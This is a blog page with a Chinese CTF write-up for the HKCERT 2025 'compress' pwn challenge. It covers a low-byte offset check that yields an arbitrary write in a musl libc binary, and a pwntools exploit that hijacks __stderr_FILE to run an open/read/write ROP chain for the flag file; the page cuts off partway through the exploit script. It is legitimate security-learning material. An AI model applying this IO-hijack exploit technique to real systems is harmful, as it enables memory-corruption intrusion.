

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="">
  <meta name="keywords" content="">
  
    <meta name="description" content="题目简介HKCERT pwn部分一道关于musl libc的题，最终357分">
<meta property="og:type" content="article">
<meta property="og:title" content="2025-HKCERT-compress">
<meta property="og:url" content="http://0x4a-210.github.io/2025/12/22/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/index.html">
<meta property="og:site_name" content="0x4A">
<meta property="og:description" content="题目简介HKCERT pwn部分一道关于musl libc的题，最终357分">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/IDA-main.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/IDA-init.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/SandBox.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/checksec.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/IDA-Add.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/disas-Add.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/disas-vuln.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/IDA-Show.png">
<meta property="article:published_time" content="2025-12-22T14:03:06.000Z">
<meta property="article:modified_time" content="2025-12-22T14:11:46.777Z">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://0x4a-210.github.io/photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/IDA-main.png">
  
  
  
  <title>2025-HKCERT-compress - 0x4A</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"0x4a-210.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>0x4A</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/Istaroth.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="2025-HKCERT-compress"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-12-22 22:03" pubdate>
          December 22, 2025 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.7k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          14 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">2025-HKCERT-compress</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="题目简介"><a href="#题目简介" class="headerlink" title="题目简介"></a>题目简介</h1><p>HKCERT pwn部分一道关于musl libc的题，最终357分<br></p>
<span id="more"></span>
<p>题目不算难，但是考察了对musl libc的IO利用，如果赛场现学musl libc还是很痛苦的<br></p>
<h1 id="漏洞点分析"><a href="#漏洞点分析" class="headerlink" title="漏洞点分析"></a>漏洞点分析</h1><p>首先看main函数：<br><br><img src="/../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/IDA-main.png" srcset="/img/loading.gif" lazyload><br>可以看到是一个菜单程序，有Add和Show两种功能<br><br>同时进入main函数后，初始化的同时开启了沙箱，且分配了0x40大小的堆块，并把堆块指针放在0x202010偏移：<br><br><img src="/../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/IDA-init.png" srcset="/img/loading.gif" lazyload><br>接着立刻查看沙箱，发现只ban掉了execve系统调用：<br><br><img src="/../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/SandBox.png" srcset="/img/loading.gif" lazyload><br>然后既然看了沙箱，那一起再看一下checksec：<br><br><img src="/../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/checksec.png" srcset="/img/loading.gif" lazyload><br>发现保护全开，想到应该是打IO或者hook。<br>接下来进入Add功能进行分析，会往所申请的堆块+0ffset的地方写入数据，且由于0x202018位置的自增，我们只有一次写入机会：<br><br><img src="/../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/IDA-Add.png" srcset="/img/loading.gif" lazyload><br>注意，这里很容易以为是直接把数据写入0x202010偏移的bss段，但从汇编能看出来，实际是往 <em><strong>0x202010偏移的地方</strong></em> 存的那个指针 <em><strong>所指向</strong></em> 的内存写东西（即*0x202010&#x3D;堆块指针&#x3D;写入的地方）：<br><br><img src="/../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/disas-Add.png" srcset="/img/loading.gif" lazyload><br>在Add函数部分，注意到对offset的校验，采用的是将offset强转为uint8_t类型后检查是否大于0x20，也就是说仅检查offset的最后一个字节是否超过（这里从反编译结果不容易注意到，可以直接看汇编，如下图）：<br><br><img src="/../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/disas-vuln.png" srcset="/img/loading.gif" lazyload><br>因此这里我们有了一个任意写的原语（只要偏移的最后一个字节不超过32，条件已经算很宽松了）<br><br>接下来同样看Show功能：<br><br><img src="/../../../photos/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/%E6%AF%94%E8%B5%9B%E9%A2%98%E8%A7%A3/2025-HKCERT-compress/IDA-Show.png" srcset="/img/loading.gif" lazyload><br>根据前面对Add的分析，这个函数实际也是打印堆块里的内容<br><br>并且也只有一次的Show机会<br><br>综合上述分析，本题唯一的漏洞在于Add功能中检查offset不严格，导致一个几乎任意偏移的写入原语，不存在malloc和free接口，应该要打IO。接下来思考如何利用<br></p>
<h1 id="漏洞点利用"><a href="#漏洞点利用" class="headerlink" title="漏洞点利用"></a>漏洞点利用</h1><p>首先想办法泄露地址，由于我们只能分别读一次和写一次，首先考虑堆块上会不会初始残留一些有用信息，因此调试看一下<br><br>但是，一运行发现这个binary是依赖musl libc编译的，也就是说这不是一道glibc pwn<br></p>
<h2 id="musl-libc简介"><a href="#musl-libc简介" class="headerlink" title="musl libc简介"></a>musl libc简介</h2><h3 id="什么是musl-libc？"><a href="#什么是musl-libc？" class="headerlink" title="什么是musl libc？"></a>什么是musl libc？</h3><p>查找musl libc的相关资料得知：musl libc是一种适用于嵌入式等场景的C语言标准库实现，和GNU写的libc不同，musl libc的特性是将loader和libc.so.6作为一个.so文件发布，也就是说不存在GNU libc中的ld文件，因此不能直接运行由musl libc编译得到的binary。</p>
<h3 id="musl-libc的运行与调试"><a href="#musl-libc的运行与调试" class="headerlink" title="musl libc的运行与调试"></a>musl libc的运行与调试</h3><p>运行时，要将给的libc.so当作我们熟悉的ld文件，用loader去启binary：<br></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">./libc.so ./pwn<br></code></pre></td></tr></table></figure>
<p>如上述命令所示<br><br>调试时，需要使用带参的gdb命令：<br></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">gdb --args ./libc.so ./pwn<br></code></pre></td></tr></table></figure>
<p>并且需要捕获loader加载binary的行为，这样才能断在binary：<br></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">set</span> stop-on-solib-events 1<br></code></pre></td></tr></table></figure>
<h3 id="musl-libc的IO"><a href="#musl-libc的IO" class="headerlink" title="musl libc的IO"></a>musl libc的IO</h3><p>和glibc类似，musl libc也存在IO结构，但具体成员和glibc相差较大，最大的特点是musl libc的IO结构里不存在vtable，而是将需要用到的函数指针打包进了结构体本身，源码如下：<br></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">IO_FILE</span> &#123;</span><br>	<span class="hljs-type">unsigned</span> flags;<br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> *rpos, *rend;<br>	<span class="hljs-type">int</span> (*close)(FILE *);<br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> *wend, *wpos;<br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> *mustbezero_1;<br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> *wbase;<br>	<span class="hljs-type">size_t</span> (*read)(FILE *, <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> *, <span class="hljs-type">size_t</span>);<br>	<span class="hljs-type">size_t</span> (*write)(FILE *, <span class="hljs-type">const</span> <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> *, <span class="hljs-type">size_t</span>);<br>	<span class="hljs-type">off_t</span> (*seek)(FILE *, <span class="hljs-type">off_t</span>, <span class="hljs-type">int</span>);<br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> *buf;<br>	<span class="hljs-type">size_t</span> buf_size;<br>	FILE *prev, *next;<br>	<span class="hljs-type">int</span> fd;<br>	<span class="hljs-type">int</span> pipe_pid;<br>	<span class="hljs-type">long</span> lockcount;<br>	<span class="hljs-type">int</span> mode;<br>	<span class="hljs-keyword">volatile</span> <span class="hljs-type">int</span> lock;<br>	<span class="hljs-type">int</span> lbf;<br>	<span class="hljs-type">void</span> *cookie;<br>	<span class="hljs-type">off_t</span> off;<br>	<span class="hljs-type">char</span> *getln_buf;<br>	<span class="hljs-type">void</span> *mustbezero_2;<br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> *shend;<br>	<span class="hljs-type">off_t</span> shlim, shcnt;<br>	FILE *prev_locked, *next_locked;<br>	<span class="hljs-class"><span class="hljs-keyword">struct</span> __<span class="hljs-title">locale_struct</span> *<span class="hljs-title">locale</span>;</span><br>&#125;;<br></code></pre></td></tr></table></figure>
<p>从这个结构体的定义可以看出来，musl libc的IO结构体中就带有重要的函数指针，而且可以大胆猜测，read、write这两个函数指针就是puts和scanf等函数最终调用的函数指针，类似glibc的vtable中的xsgetn和xsputn<br><br>而且更有利的是，没有了vtable的检查，且观察源码可以进一步发现musl libc不会对这些函数指针做合法性校验：<br><br>以puts为例，调用链为puts-&gt;fputs-&gt;fwrite-&gt;fwritex-&gt;__stdout_FILE.write：<br></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> <span class="hljs-title function_">puts</span><span class="hljs-params">(<span class="hljs-type">const</span> <span class="hljs-type">char</span> *s)</span><br>&#123;<br>	<span class="hljs-type">int</span> r;<br>	FLOCK(<span class="hljs-built_in">stdout</span>);<br>	r = -(<span class="hljs-built_in">fputs</span>(s, <span class="hljs-built_in">stdout</span>) &lt; <span class="hljs-number">0</span> || putc_unlocked(<span class="hljs-string">&#x27;\n&#x27;</span>, <span class="hljs-built_in">stdout</span>) &lt; <span class="hljs-number">0</span>);<br>	FUNLOCK(<span class="hljs-built_in">stdout</span>);<br>	<span class="hljs-keyword">return</span> r;<br>&#125;<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">fputs</span><span class="hljs-params">(<span class="hljs-type">const</span> <span class="hljs-type">char</span> *<span class="hljs-keyword">restrict</span> s, FILE *<span class="hljs-keyword">restrict</span> f)</span><br>&#123;<br>	<span class="hljs-type">size_t</span> l = <span class="hljs-built_in">strlen</span>(s);<br>	<span class="hljs-keyword">return</span> (fwrite(s, <span class="hljs-number">1</span>, l, f)==l) - <span class="hljs-number">1</span>;<br>&#125;<br><br><span class="hljs-type">size_t</span> <span class="hljs-title function_">fwrite</span><span class="hljs-params">(<span class="hljs-type">const</span> <span class="hljs-type">void</span> *<span class="hljs-keyword">restrict</span> src, <span class="hljs-type">size_t</span> size, <span class="hljs-type">size_t</span> nmemb, FILE *<span class="hljs-keyword">restrict</span> f)</span><br>&#123;<br>	<span class="hljs-type">size_t</span> k, l = size*nmemb;<br>	<span class="hljs-keyword">if</span> (!size) nmemb = <span class="hljs-number">0</span>;<br>	FLOCK(f);<br>	k = __fwritex(src, l, f);<br>	FUNLOCK(f);<br>	<span class="hljs-keyword">return</span> k==l ? nmemb : k/size;<br>&#125;<br><br><span class="hljs-type">size_t</span> __fwritex(<span class="hljs-type">const</span> <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> *<span class="hljs-keyword">restrict</span> s, <span class="hljs-type">size_t</span> l, FILE *<span class="hljs-keyword">restrict</span> f)<br>&#123;<br>	<span class="hljs-type">size_t</span> i=<span class="hljs-number">0</span>;<br><br>	<span class="hljs-keyword">if</span> (!f-&gt;wend &amp;&amp; __towrite(f)) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>	<span class="hljs-keyword">if</span> (l &gt; f-&gt;wend - f-&gt;wpos) <span class="hljs-keyword">return</span> f-&gt;write(f, s, l);<br><br>	<span class="hljs-keyword">if</span> (f-&gt;lbf &gt;= <span class="hljs-number">0</span>) &#123;<br>		<span class="hljs-comment">/* Match /^(.*\n|)/ */</span><br>		<span class="hljs-keyword">for</span> (i=l; i &amp;&amp; s[i<span class="hljs-number">-1</span>] != <span class="hljs-string">&#x27;\n&#x27;</span>; i--);<br>		<span class="hljs-keyword">if</span> (i) &#123;<br>			<span class="hljs-type">size_t</span> n = f-&gt;write(f, s, i);<br>			<span class="hljs-keyword">if</span> (n &lt; i) <span class="hljs-keyword">return</span> n;<br>			s += i;<br>			l -= i;<br>		&#125;<br>	&#125;<br><br>	<span class="hljs-built_in">memcpy</span>(f-&gt;wpos, s, l);<br>	f-&gt;wpos += l;<br>	<span class="hljs-keyword">return</span> l+i;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>不得不说，musl libc还是非常简洁的，没有glibc的宏定义过度封装，这才是人看的代码（bushi<br><br>符号语义方面，对应glibc，标准输入、标准输出和标准错误三个结构体的指针变量名依然是stdin、stdout和stderr，但是结构体变量名发生了变化，源码如下：<br></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c">FILE *<span class="hljs-type">const</span> <span class="hljs-built_in">stdin</span> = &amp;__stdin_FILE;<br>FILE *<span class="hljs-type">const</span> <span class="hljs-built_in">stdout</span> = &amp;__stdout_FILE;<br>FILE *<span class="hljs-type">const</span> <span class="hljs-built_in">stderr</span> = &amp;__stderr_FILE;<br></code></pre></td></tr></table></figure>
<p>很容易看出来，musl libc中，_<em>stderr_FILE&#x3D;glibc的_IO_2_1_stderr</em>，其他则类似，这就使得我们很好定位这些关键结构体了<br><br>剩下的问题就是如何泄露musl libc的地址，并任意写到IO_FILE里<br></p>
<h2 id="利用链"><a href="#利用链" class="headerlink" title="利用链"></a>利用链</h2><h2 id="最终exp"><a href="#最终exp" class="headerlink" title="最终exp"></a>最终exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> optparse <span class="hljs-keyword">import</span> OptionParser<br><br>parser = OptionParser() <br>parser.add_option(<span class="hljs-string">&quot;-m&quot;</span>, <span class="hljs-string">&quot;--mode&quot;</span>, dest=<span class="hljs-string">&quot;mode&quot;</span>, default=<span class="hljs-string">&quot;local&quot;</span>)   <br>(options, args) = parser.parse_args()<br><br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>,arch=<span class="hljs-string">&#x27;amd64&#x27;</span>,log_level=<span class="hljs-string">&quot;debug&quot;</span>)<br>context.terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>]<br>targetELF=<span class="hljs-string">&quot;./pwn&quot;</span><br>elf=ELF(targetELF,checksec=<span class="hljs-literal">False</span>)<br>libc=ELF(<span class="hljs-string">&quot;./libc.so&quot;</span>,checksec=<span class="hljs-literal">False</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">FakeContext</span>(<span class="hljs-params">libc_base_,libc_</span>):<br>    retAlignPadding=libc_base_+<span class="hljs-number">0xcdc</span><br>    context_=p64(<span class="hljs-number">0x45</span>)<br>    context_+=<span class="hljs-string">b&#x27;1&#x27;</span>*<span class="hljs-number">0x18</span><br>    context_+=p64(retAlignPadding)+p64(retAlignPadding)  <span class="hljs-comment">#wpos wend填充</span><br>    context_+=p64(libc_base_+libc_.symbols[<span class="hljs-string">&quot;__stderr_FILE&quot;</span>])+p64(retAlignPadding)<br>    <span class="hljs-keyword">return</span> context_<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">HouseOfMusl</span>(<span class="hljs-params">libc_base_,libc_</span>):<br>    pop_rdi_ret=libc_base_+<span class="hljs-number">0x14862</span><br>    pop_rsi_ret=libc_base+<span class="hljs-number">0x1c237</span><br>    pop_rdx_ret=libc_base+<span class="hljs-number">0x1bea2</span><br>    open_addr=libc_base_+libc_.symbols[<span class="hljs-string">&quot;open&quot;</span>]<br>    read_addr=libc_base_+libc_.symbols[<span class="hljs-string">&quot;read&quot;</span>]<br>    write_addr=libc_base+libc_.symbols[<span class="hljs-string">&quot;write&quot;</span>]<br><br>    orw_=p64(pop_rdi_ret)+p64(libc_base_+libc_.symbols[<span class="hljs-string">&quot;__stderr_FILE&quot;</span>]+<span class="hljs-number">152</span>)+p64(pop_rsi_ret)+p64(<span class="hljs-number">0</span>)+p64(open_addr)<br>    orw_+=p64(pop_rdi_ret)+p64(<span class="hljs-number">3</span>)+p64(pop_rsi_ret)+p64(libc_base_+libc_.symbols[<span class="hljs-string">&quot;__stderr_FILE&quot;</span>]+<span class="hljs-number">160</span>)+p64(pop_rdx_ret)+p64(<span class="hljs-number">50</span>)+p64(read_addr)<br>    orw_+=p64(pop_rdi_ret)+p64(<span class="hljs-number">1</span>)+p64(pop_rsi_ret)+p64(libc_base_+libc_.symbols[<span class="hljs-string">&quot;__stderr_FILE&quot;</span>]+<span class="hljs-number">160</span>)+p64(pop_rdx_ret)+p64(<span class="hljs-number">50</span>)+p64(write_addr)<br>    data_=<span class="hljs-string">b&quot;flag\x00&quot;</span>+<span class="hljs-string">b&#x27;2&#x27;</span>*<span class="hljs-number">3</span><br><br>    context_=FakeContext(libc_base_,libc_)<br><br>    payload_=orw_+data_<br>    payload_size=<span class="hljs-built_in">len</span>(payload_)<br>    payload_+=<span class="hljs-string">b&#x27;3&#x27;</span>*(<span class="hljs-number">0x100</span>-payload_size)<br>    payload_+=<span class="hljs-string">b&#x27;4&#x27;</span>*<span class="hljs-number">0x100</span><br>    payload_+=context_<br>    payload_+=<span class="hljs-string">b&#x27;\x00&#x27;</span>*<span class="hljs-number">8</span>+p64(libc_base_+libc_.symbols[<span class="hljs-string">&quot;longjmp&quot;</span>]+<span class="hljs-number">34</span>)<br><br>    <span class="hljs-keyword">return</span> payload_<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">Lauch</span>():<br>    <span class="hljs-keyword">if</span> options.mode==<span class="hljs-string">&quot;local&quot;</span>:<br>        io=process([<span class="hljs-string">&quot;./libc.so&quot;</span>,targetELF])<br>    <span class="hljs-keyword">elif</span> options.mode==<span class="hljs-string">&quot;remote&quot;</span>:<br>        io=remote(<span class="hljs-string">&quot;pwn-1ce2841b26.challenge.xctf.org.cn&quot;</span>, <span class="hljs-number">9999</span>, ssl=<span class="hljs-literal">True</span>)<br>    <span class="hljs-keyword">elif</span> options.mode==<span class="hljs-string">&quot;debug&quot;</span>:<br>        io=gdb.debug([<span 